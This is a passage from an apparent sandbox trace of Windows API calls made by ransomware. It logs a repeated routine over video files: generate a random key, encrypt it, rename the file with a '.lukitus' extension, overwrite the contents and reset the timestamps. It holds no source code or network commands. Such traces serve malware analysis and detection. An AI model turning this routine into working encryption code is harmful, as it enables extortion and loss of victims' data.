hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.325] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\jHPdC0WPi4JYh1.flv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\jhpdc0wpi4jyh1.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.325] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\jHPdC0WPi4JYh1.flv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\jhpdc0wpi4jyh1.flv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\F56924BE-9663-41BB-5163FD42-2B989A19C670.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\f56924be-9663-41bb-5163fd42-2b989a19c670.lukitus"), dwFlags=0x9) returned 1 [0109.326] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.326] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.331] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x13d97, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x13d97, lpOverlapped=0x0) returned 1 [0109.332] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.332] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x13d97, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x13d97, lpOverlapped=0x0) returned 1 [0109.332] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.332] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65305550, dwHighDateTime=0x1d31760)) [0109.332] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.332] FlushFileBuffers (hFile=0x328) returned 1 [0109.335] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\wKIU.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\wkiu.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb323e40, ftCreationTime.dwHighDateTime=0x1d2fdd1, ftLastAccessTime.dwLowDateTime=0xf89e2660, ftLastAccessTime.dwHighDateTime=0x1d2fc6b, ftLastWriteTime.dwLowDateTime=0xf89e2660, ftLastWriteTime.dwHighDateTime=0x1d2fc6b, nFileSizeHigh=0x0, nFileSizeLow=0x8d1b)) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.336] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\wKIU.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\wkiu.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.336] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\wKIU.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\wkiu.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\F56924BE-9663-41BB-4BD5A65F-19DB8AEF6518.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\f56924be-9663-41bb-4bd5a65f-19db8aef6518.lukitus"), dwFlags=0x9) returned 1 [0109.337] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.337] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.342] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8d1b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8d1b, lpOverlapped=0x0) returned 1 [0109.342] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.342] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8d1b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8d1b, lpOverlapped=0x0) returned 1 [0109.342] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.343] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6532b6b0, dwHighDateTime=0x1d31760)) [0109.343] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.343] FlushFileBuffers (hFile=0x328) returned 1 [0109.346] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\BmSmMoZk2gCziPMvpsZ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\bmsmmozk2gczipmvpsz.avi"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482d1ad0, ftCreationTime.dwHighDateTime=0x1d2f639, ftLastAccessTime.dwLowDateTime=0xa8e12d00, ftLastAccessTime.dwHighDateTime=0x1d2f8ee, ftLastWriteTime.dwLowDateTime=0xa8e12d00, ftLastWriteTime.dwHighDateTime=0x1d2f8ee, nFileSizeHigh=0x0, nFileSizeLow=0x166e5)) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.346] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\BmSmMoZk2gCziPMvpsZ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\bmsmmozk2gczipmvpsz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.347] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\BmSmMoZk2gCziPMvpsZ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\bmsmmozk2gczipmvpsz.avi"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\F56924BE-9663-41BB-09D24D7F-1993D32C1FBE.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\f56924be-9663-41bb-09d24d7f-1993d32c1fbe.lukitus"), dwFlags=0x9) returned 1 [0109.354] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.354] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.358] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x166e5, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x166e5, lpOverlapped=0x0) returned 1 [0109.359] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.359] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x166e5, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x166e5, lpOverlapped=0x0) returned 1 [0109.360] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.360] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65351810, dwHighDateTime=0x1d31760)) [0109.360] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.360] FlushFileBuffers (hFile=0x328) returned 1 [0109.363] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\eSi7n7P2AfSI0U.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\esi7n7p2afsi0u.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e47a340, ftCreationTime.dwHighDateTime=0x1d30398, ftLastAccessTime.dwLowDateTime=0xab9eee00, ftLastAccessTime.dwHighDateTime=0x1d300b0, ftLastWriteTime.dwLowDateTime=0xab9eee00, ftLastWriteTime.dwHighDateTime=0x1d300b0, nFileSizeHigh=0x0, nFileSizeLow=0xa4f3)) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.364] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\eSi7n7P2AfSI0U.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\esi7n7p2afsi0u.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.364] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\eSi7n7P2AfSI0U.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\esi7n7p2afsi0u.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\F56924BE-9663-41BB-B340460A-8184FDA16B6E.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\f56924be-9663-41bb-b340460a-8184fda16b6e.lukitus"), dwFlags=0x9) returned 1 [0109.365] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.365] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.370] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa4f3, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa4f3, lpOverlapped=0x0) returned 1 [0109.370] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.370] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa4f3, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa4f3, lpOverlapped=0x0) returned 1 [0109.371] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.371] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65377970, dwHighDateTime=0x1d31760)) [0109.371] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.371] FlushFileBuffers (hFile=0x328) returned 1 [0109.374] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\G36Xd28j-O.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\g36xd28j-o.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8687c0, ftCreationTime.dwHighDateTime=0x1d301bd, ftLastAccessTime.dwLowDateTime=0xb0882350, ftLastAccessTime.dwHighDateTime=0x1d2fe26, ftLastWriteTime.dwLowDateTime=0xb0882350, ftLastWriteTime.dwHighDateTime=0x1d2fe26, nFileSizeHigh=0x0, nFileSizeLow=0x10be2)) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.374] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\G36Xd28j-O.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\g36xd28j-o.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.375] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\G36Xd28j-O.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\g36xd28j-o.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\F56924BE-9663-41BB-693A5B37-95AAFD86E03D.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\f56924be-9663-41bb-693a5b37-95aafd86e03d.lukitus"), dwFlags=0x9) returned 1 [0109.376] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: 